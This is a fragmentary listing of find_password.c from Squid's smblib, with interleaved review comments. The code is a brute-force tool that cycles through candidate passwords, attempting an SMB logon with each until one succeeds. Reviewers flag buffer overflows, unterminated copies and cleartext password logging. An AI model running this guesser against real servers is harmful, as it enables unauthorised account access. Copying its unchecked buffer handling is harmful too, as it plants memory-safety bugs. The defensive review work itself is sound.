git.ipfire.org Git - thirdparty/squid.git/blob - lib/smblib/find_password.c
2 /* Find passwords ... */
3 /* We do it in a brute force way ... Cycle through all the possible passwords
4 sending a logon to see if it works ... We have to wait for any timeout
5 that the server implements before we try the next one. We could open lots
6 of connections to the server and then send the logon request and not wait
7 for the reply. This would allow us to have lots of outstanding attempts at
10 #include <sys/types.h>
16 #include "smblib/smblib.h"
/* Dialect name strings; main() passes this array to SMB_Negotiate().
 * Only the first entries of the initialiser are visible in this listing. */
21 char *SMB_Prots
[] = {"PC NETWORK PROGRAM 1.0",
22 "MICROSOFT NETWORKS 1.03",
23 "MICROSOFT NETWORKS 3.0",
/* NOTE(review): the getopt() string in main() is "s:u:l:v", so -s <service>
 * and -v are accepted but are not mentioned in this usage text. */
35 fprintf(stderr
,"Usage: find_password -u <user> -l <pwd-len-max> server\n");
38 /* figure out next password */
/* Enumeration state is kept in these two file-scope statics, so there is one
 * sequence per process and the function is not reentrant. */
40 static int pwinit
= FALSE
, pwpos
= 0;
/*
 * next_password: main() calls this in a loop and continues while it returns
 * TRUE; it returns FALSE once pwpos has reached pwlen. The lines that
 * actually advance pw are not part of this listing.
 *
 * pw must have room for at least pwlen + 1 bytes, because the pwinit == FALSE
 * branch zeroes that many.
 * NOTE(review): main() passes a char[80] together with a pwlen taken from
 * atoi(optarg) with no visible range check, so a -l value of 80 or more makes
 * the memset below write past the caller's buffer. A bound on pwlen belongs
 * either here or at the option parsing.
 */
42 int next_password(char *pw
, int pwlen
)
47 if (pwinit
== FALSE
) {
/* Clears pwlen + 1 bytes of the caller's buffer. */
50 memset(pw
, 0, pwlen
+ 1);
61 /* If it has wrapped around, then inc to 1 and carry up the chain */
68 if (i
< 0) { /* If we went off the end, increment pwpos */
71 if (pwpos
>= pwlen
) return(FALSE
); /* No more passwords */
/* Single shared output buffer: every call to print_password() writes into
 * the same storage. */
85 static char pwd_str
[1024]; /* Where we put passwords as we convert them */
/*
 * print_password: builds a printable copy of password in pwd_str. Bytes that
 * are <= ' ' or > 127 are replaced by a decimal code produced with "%03i";
 * all other bytes are copied unchanged. The result is NUL-terminated.
 * Presumably returns pwd_str (the return statement is not in this listing).
 *
 * NOTE(review): no visible check bounds j against sizeof(pwd_str). An escaped
 * byte occupies four output bytes, so an input longer than roughly 255 bytes
 * could run past the 1024-byte buffer; main() only passes an 80-byte array.
 */
87 char *print_password(char * password
)
/* strlen(password) is re-evaluated on every iteration of this loop. */
95 for (i
= 0; i
< strlen(password
); i
++) {
/* NOTE(review): where plain char is signed, a byte above 127 is negative;
 * the cast to unsigned makes it a large value, so the "> 127" test still
 * selects the escape branch, but (int)password[i] below is then negative and
 * "%03i" prints a signed number that can be four characters wide, while j is
 * advanced by three. Converting through unsigned char would keep the escape
 * at a fixed three digits -- confirm intent. */
97 if (((unsigned)password
[i
] <= ' ') || ((unsigned)password
[i
] > 127)) {
/* snprintf() already reserves room for the terminator, so the "- 1" only
 * shortens the usable space in temp by one byte. */
100 snprintf(temp
, sizeof(temp
)-1, "%03i", (int)password
[i
]);
/* The digits go in at j + 1; per the comment two lines down, the byte at j
 * is for a '\' that is written by a line not shown here. */
101 strcpy(&pwd_str
[j
+ 1], temp
);
102 j
= j
+ 3; /* Space for \ accounted for below */
/* Printable byte: copied through as-is. */
105 pwd_str
[j
] = password
[i
];
111 pwd_str
[j
] = 0; /* Put a null on the end ... */
/*
 * main: parses the options "s:u:l:v" plus an optional server argument,
 * connects with SMB_Connect_Server(), negotiates with SMB_Negotiate(), and
 * then calls SMB_Logon_And_TCon() once for every candidate that
 * next_password() produces, stopping the report at "Passwords exhausted.".
 * Many lines of the function are missing from this listing; the notes below
 * cover only the statements that are visible.
 */
117 main(int argc
, char *argv
[])
/* Only tries has an initialiser here. NOTE(review): if -l is omitted and no
 * line outside this listing assigns pwlen, it is read uninitialised. */
123 int opt
, error
, SMB_Error
, err_class
, err_code
, pwlen
, tries
= 0;
/* Fixed-size stack buffers, declared without initialisers; they are filled
 * from command-line arguments below. */
124 char server
[80], service
[80], service_name
[160], password
[80], username
[80];
125 char old_password
[80], err_string
[1024];
/* Default share name; a short literal, so strncpy() zero-pads the rest. */
128 strncpy(service
, "IPC$", sizeof(service
) - 1);
134 while ((opt
= getopt(argc
, argv
, "s:u:l:v")) != EOF
) {
/* NOTE(review): unbounded copy of a command-line argument into the 80-byte
 * service array; a longer -s value overruns the stack buffer. The other
 * options use strncpy() with a size. */
139 strcpy(service
, optarg
);
142 case 'u': /* Pick up the user name */
/* NOTE(review): strncpy() with sizeof - 1 never writes the last byte, and no
 * initialiser is visible for username, so an argument of 79 or more
 * characters leaves the string unterminated unless a line not shown zeroes
 * the array first. */
144 strncpy(username
, optarg
, sizeof(username
) - 1);
147 case 'l': /* pick up password len */
/* NOTE(review): atoi() cannot report a malformed number, and no range check
 * is visible. pwlen later sizes a memset into password[80] inside
 * next_password(), so it has to stay below 80 (and above 0). */
149 pwlen
= atoi(optarg
);
152 case 'v': /* Verbose? */
165 if (optind
< argc
) { /* Some more parameters, assume is the server */
/* Same termination caveat as for username above. */
166 strncpy(server
, argv
[optind
], sizeof(server
) - 1);
/* Apparently the fallback when no server argument is given: a built-in
 * host name. */
169 strcpy(server
, "nemesis");
172 if (verbose
== TRUE
) { /* Print out all we know */
174 fprintf(stderr
, "Finding password for User: %s, on server: %s\n",
176 fprintf(stderr
, "with a pwlen = %i\n", pwlen
);
180 SMB_Init(); /* Initialize things ... */
182 /* We connect to the server and negotiate */
184 con
= SMB_Connect_Server(NULL
, server
);
186 if (con
== NULL
) { /* Error processing */
188 fprintf(stderr
, "Unable to connect to server %s ...\n", server
);
/* A remote (server-reported) error is split into class and code and turned
 * into text; any other error goes through SMB_Get_Error_Msg(). The same
 * sequence is repeated after the negotiate and logon failures below. */
190 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
192 SMB_Error
= SMB_Get_Last_SMB_Err();
193 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
194 SMBlib_Error_Code(SMB_Error
),
196 sizeof(err_string
) - 1);
199 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
202 printf(" %s\n", err_string
);
207 /* We need to negotiate a protocol better than PC NetWork Program */
209 if (SMB_Negotiate(con
, SMB_Prots
) < 0) {
211 fprintf(stderr
, "Unable to negotiate a protocol with server %s ...\n",
214 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
216 SMB_Error
= SMB_Get_Last_SMB_Err();
217 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
218 SMBlib_Error_Code(SMB_Error
),
220 sizeof(err_string
) - 1);
223 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
226 printf(" %s\n", err_string
);
/* NOTE(review): sprintf() expects the format string as its second argument,
 * but a size is passed in that position; the argument list is the one
 * snprintf() takes. Even with snprintf(), server (up to 79 bytes) plus
 * service (up to 79) plus three backslashes can exceed the 160-byte
 * service_name, so the return value should be checked for truncation. */
231 sprintf(service_name
, sizeof(service_name
)-1, "\\\\%s\\%s", server
, service
); /* Could blow up */
233 /* Now loop through all password possibilities ... */
235 memset(password
, 0, sizeof(password
));
/* One SMB_Logon_And_TCon() call is made per candidate over the single
 * connection con. Seen from the server, that is a run of failed logons
 * (presumably all for the -u account; the argument lines are not shown),
 * which is the pattern lockout thresholds and failed-logon auditing act on. */
237 while (next_password(password
, pwlen
) == TRUE
) {
239 if ((tree
= SMB_Logon_And_TCon(con
,
243 service_name
, "?????")) == NULL
) {
245 if (verbose
== TRUE
) { /* Lets hear about the error */
247 fprintf(stderr
, "Unable to logon and tree connect to server %s ...\n",
/* In verbose mode every rejected candidate is written to stderr in clear
 * text through print_password(). */
249 fprintf(stderr
, "With username: %s, and password: %s\n",
250 username
, print_password(password
));
252 if (SMB_Get_Last_Error() == SMBlibE_Remote
) {
254 SMB_Error
= SMB_Get_Last_SMB_Err();
255 SMB_Get_SMB_Error_Msg(SMBlib_Error_Class(SMB_Error
),
256 SMBlib_Error_Code(SMB_Error
),
258 sizeof(err_string
) - 1);
261 SMB_Get_Error_Msg(SMB_Get_Last_Error(), err_string
, sizeof(err_string
) - 1);
264 printf(" %s\n", err_string
);
267 } else { /* Password match */
/* The accepted password is also written to stderr in clear text, so any
 * terminal scrollback or redirected log that captures stderr then holds a
 * valid credential. */
269 fprintf(stderr
, "Logged in with password:%s\n",
270 print_password(password
));
/* This message has no trailing newline. */
280 fprintf(stderr
, "Passwords exhausted.");